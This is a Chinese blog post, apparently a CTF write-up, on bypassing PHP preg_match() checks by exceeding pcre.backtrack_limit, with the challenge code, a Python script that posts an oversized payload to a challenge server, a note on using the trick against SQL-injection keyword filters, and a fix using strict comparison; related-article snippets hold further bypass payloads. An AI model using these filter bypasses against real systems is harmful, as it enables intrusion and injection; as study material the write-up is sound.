CTF之preg_match()函数绕过

最新推荐文章于 2024-06-06 11:44:03 发布
最新推荐文章于 2024-06-06 11:44:03 发布
阅读量4.1k 收藏 23
点赞数 2
分类专栏: CTF 文章标签: php 正则表达式 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53568983/article/details/129300129
版权

文章目录

前言

<?php
error_reporting(0);
highlight_file(__FILE__);

$a = $_POST['heizi'];
if (isset($a)){
   if(substr($a,0,5) == "aikun" and substr($a,-10,10) == "xiaojijiao"){  # 限制死了,aikun字符xiaojijiao
       if ($a == "aikunxiaojijiao"){
           die("nononono");
       }
       if (preg_match('/aikun.+?xiaojijiao/is',$a)){
       /*
       . 匹配除换行的所有字符
       + 匹配+号前的字符1次或多次
       ? 匹配?号前的字符0次或多次

       i   :不区分大小写
       s   :.可以表示换行
       */
           die("Hack!!!");
       }
       system("ls");  # 目的
   }else{
       die("what?");
   }
}
?>

由上所示,我们的目的就是输出system("ls");,可是前面三条if语句已经写死了,不可能数组绕过:preg_match只能处理字符串,当传入的subject是数组时会返回false,不可能换行符绕过, s :.可以表示换行
先不急,先看如下的:

0x01 正则表达式是什么

  1. 正则表达式是一个可以被有限状态自动机接受的语言类。(有限状态自动机:要么匹配成功,要么失败)
  2. 正则匹配通过正则引擎实现,正则引擎又被细分为DFA(确定性有限状态自动机)与NFA(非确定性有限状态自动机)
    • DFA: 从起始状态开始,一个字符一个字符地读取输入串,并根据正则来一步步确定至下一个转移状态,直到匹配不上或走完整个输入
    • NFA:从起始状态开始,一个字符一个字符地读取输入串,并与正则表达式进行匹配,如果匹配不上,则进行回溯,尝试其他状态

    由于NFA的执行过程存在回溯,所以其性能会劣于DFA,但它支持更多功能。大多数程序语言都使用了NFA作为正则引擎,其中也包括PHP使用的PCRE库。

0x02 回溯的过程是怎样的

对于preg_match('/aikun.+?xiaojijiao/is',$a),如果$a=aikunaaaaxiaojijiao

  1. 首先匹配aikun
  2. aikun.+?中的.+可以匹配如下的aaaaxiaojijiao字符,然后匹配引擎发现xiaojijiao没有匹配的项了,开始向前回溯
  3. .+开始匹配aaaaxiaojijia,xiaojijiao与a不匹配,又开始回溯
  4. .+开始匹配aaaaxiaojiji,xiaojijiao与ao不匹配,又开始回溯。。。。
  5. 回溯到.+?开始匹配aaaa,xiaojijiao与xiaojijiao正好匹配,匹配完成

0x03PHP的pcre.backtrack_limit限制利用

如上所示,如果一直匹配是不是会浪费系统资源,只要你写的正则足够复杂,你就可以让匹配引擎一直匹配,所有
PHP为了防止正则表达式的拒绝服务攻击(reDOS),给pcre设定了一个回溯次数上限pcre.backtrack_limit。
我们可以通过var_dump(ini_get(‘pcre.backtrack_limit’));的方式查看当前环境下的上限:(回溯次数上限默认是100)

import requests

data = {
  'heizi': 'aikun' +'a'*1000000 + 'xiaojijiao'
}

res = requests.post('http://182.148.156.200:9134/', data=data, allow_redirects=False)
print(res.text)

如上所示写一个脚本,让匹配引擎匹配超过1000000次,preg_match(‘/aikun.+?xiaojijiao/is’,$a)返回false,目的达到

0x04 PCRE另一种错误的用法

对于sql注入,我们都知道就是字符匹配,发现使用了preg_match()函数就可以使用回溯进行绕过:

 if(preg_match('/UNION/is', $input)) {
     die('SQL Injection');
 }

0x05 修复方法

如果用preg_match对字符串进行匹配,一定要使用===全等号来判断返回值,就算回溯成功false也不全等于0

安全天天学
关注
  • 2
    点赞
  • 23
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
渗透测试——漏洞扫描工具
wuli1024的博客
11-20 377
然后还要将all这个压缩包里的plugin_feed_info.inc提取出来,命令行是 tar -zxvf all-2.0.tar.gz plugin_feed_info.inc,然鹅,我提取不出来。将下载好的插件移动到Nessus目录下,然后输入sudo /opt/nessus/sbin/nessuscli update all-2.0.tar.gz。用户名和密码随便写写就好,随后将会更新补丁,OK,这样Nessus可以使用了。将会获得一串数字,然后去激活码的这个网站,输入自己的邮箱获取激活码。
正则表达式题目(ctf题)
weixin_60777183的博客
08-30 1166
题目: <?php $key='flag{********************************}'; $Regular=preg_match("/zkaq.*key.{2,9}:\/.*\/(key*key)/i",trim($_GET["id"]),$match); if($Regular){ die('key:'.$key); } 解答: key里面有想要的Flag,要得到key需要$Regular大于0,$Regular变量中用了”preg_...
ctfshow-web入门-命令执行(web29)五种解法绕过文件名检测
最新发布
Welcome To Myon'Blog !
06-06 472
它的 payload 里用到了两个连续的单引号,在一些系统中,连续的两个单引号会被解释为一个单引号,而不会被视为字符串的结尾,从而使得字符串拼接在一起。因此,"fl''ag.php" 被解释为 "flag.php",从而绕过对文件名的检测。第一题代码很简单,就是对 preg_match 绕过,只要提交的参数值不出现 flag 就行。这条命令的作用是输出指定文件的内容,并在每一行前面加上行号。可以看到 flag 就在当前目录下,叫 flag.php。写入成功,这里还是测了一会儿才弄好,注意对单引号的转义。
CTF 总结02:preg_match()绕过
热门推荐
weixin_42789937的博客
01-18 1万+
preg_match()绕过,小白总结,修改过一次,后期会根据做题经历有所增补~
preg_match函数绕过
weixin_42478365的博客
10-10 7413
<?php error_reporting(0); if(!isset($_GET['code'])){ highlight_file(__FILE__); }else{ $code = $_GET['code']; if(preg_match("/[A-Za-z0-9_$@]+/",$code)){ die('fighting!'); } eval($code); } 1.绕过数字和字母 首先,我们常见的CTF题代码如下,主要是绕过数字和字
关于正则匹配preg_match(‘/^O:\d+/‘)的绕过的几种方法
m0_63138919的博客
10-13 2057
本文为preg_match('/^O:d+/')正则 匹配绕过的方法
CTF_snow_隐写工具
05-19
CTF_snow_隐写工具,找了好久才找到,非常好用,打CTF比赛必备!!!
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
ctf脚本_ctfpy脚本_ctf跑脚本_ctf_ctf脚本密码_
09-30
ctf 密码学 脚本 合集 非常 nice
CTF_AWD_Platform:CTF 攻防对抗平台
05-03
开发目的即一款优秀的专用于比赛的CTF平台,它丰富的比赛内容,灵活的比赛模式以及各项人性化的功能模块满足了比赛举办者的所有要求。然而,同时并不局限于比赛的用途,使用者同样可以用来练习CTF解题和靶机攻防。...
CTF.rar_ctf_seed7rj
09-21
【标题】"CTF.rar_ctf_seed7rj" 暗示了这是一个与网络安全相关的挑战,CTF(Capture The Flag)是网络安全领域常见的比赛形式,通常涉及逆向工程、密码学、网络攻防等技能。"seed7rj"可能是这次挑战的一个特定标识...
绕过preg_match
代码审计
03-21 2615
绕过preg_match <?php $input = $_GET['input']; if (preg_match("/[a-zA-Z]/", $input)) { exit("wrong"); } eval($input); 可以简单的理解preg_match("/[a-zA-Z]/" 正则表达式匹配 大小写字母符号 最终的目的是要到eval()函数中去执行任意代码,这题也就是考研我们如何绕过这个preg_match。 简单来说将特殊字符通过异或的方式重组了phpinfo(); 什么是按
关于PHP函数preg_match绕过、move_uploaded_file绕过方式以及include包含例题
Mark的博客
12-02 3284
preg_match函数定义与用法: 企业级理解: preg_match —— 执行匹配正则表达式 语法 int preg_match ( string $pattern , string KaTeX parse error: Expected 'EOF', got '&' at position 18: …bject [, array &̲matches[, int $flags = 0 [, int $offset = 0 ]]] ) $pattern: 要搜索的模式,字符串形式。
PHP CTF常见考题的绕过技巧
m0_48108919的博客
04-07 1万+
1.===绕过 PHP比较运算符 ===在进行比较的时候,会先判断两种字符串的类型是否相等,再比较值是否相等。 只要两边字符串类型不同会返回false
正则
ctf_htj的专栏
12-20 832
正则 一 VI中如何使用正则表达式 使用正则表达式的命令最常见的就是/ (搜索)命令。其格式如下: /正则表达式 另一个很有用的命令就是 :s(替换)命令,将第一个//之间的正则表达式替换成第二个//之间的字符串。 :s/正则表达式/替换字符串/选项 二、元字符 元字符是具有特殊意义的字符。使用元字符可以表达任意字符、行首、行 尾、某几个字符等意义。 元字符一览
刷题(1)
qq_62046696的博客
09-28 960
构造payload:fl%61g[%61rg]=}require(~(%8F%97%8F%C5%D0%D0%99%96%93%8B%9A%8D%D0%8D%9A%9E%9B%C2%9C%90%91%89%9A%8D%8B%D1%9D%9E%8C%9A%C9%CB%D2%9A%91%9C%90%9B%9A%D0%8D%9A%8C%90%8A%8D%9C%9A%C2%8D%9A%9E%CE%99%93%CB%98%D1%8F%97%8F));但是有三个参数,不知道哪个有用,试一下哪个有用,一个个删一下看看。
preg_match绕过
06-10
preg_match函数PHP中用于执行正则表达式匹配的函数。在CTF比赛中,可能会遇到一些安全控制中使用了正则表达式检查输入的情况。为了绕过这种检查,可以尝试以下方法: 1. 绕过正则表达式匹配的特殊字符:在正则表达式中,有一些特殊字符如$、^、*、+等,如果直接输入这些字符,很可能会被正则表达式匹配函数检测出来。可以使用反斜杠\对这些特殊字符进行转义,绕过检测。例如,要匹配字符串$abc,可以使用正则表达式/\$abc/。 2. 绕过正则表达式中使用的黑名单:有时候,安全控制会设置一个正则表达式的黑名单,例如禁止出现' or ''='等关键词。可以使用一些技巧来绕过这种检测,例如使用大小写混合、使用空格、使用HTML实体等。例如,要匹配字符串' or ''=',可以使用正则表达式/'[\s]*oR[\s]*'='[\s]*'/i,其中[\s]*表示0个或多个空格,i表示大小写不敏感。 3. 利用正则表达式的漏洞:有时候,正则表达式本身可能存在一些漏洞,可以利用这些漏洞来绕过安全控制。例如,正则表达式中的量词可能会导致性能问题,可以尝试使用非贪婪量词来绕过匹配。例如,要匹配字符串abc,可以使用正则表达式/a.*?c/,其中.*?表示非贪婪匹配任意字符。 4. 绕过正则表达式的限制:有时候,正则表达式的长度限制或者复杂度限制可能会导致无法匹配某些字符串。可以尝试使用一些技巧来绕过这种限制,例如将正则表达式拆分成多个部分、使用递归匹配等。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

安全天天学

你的鼓励是对我最大的鼓励

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值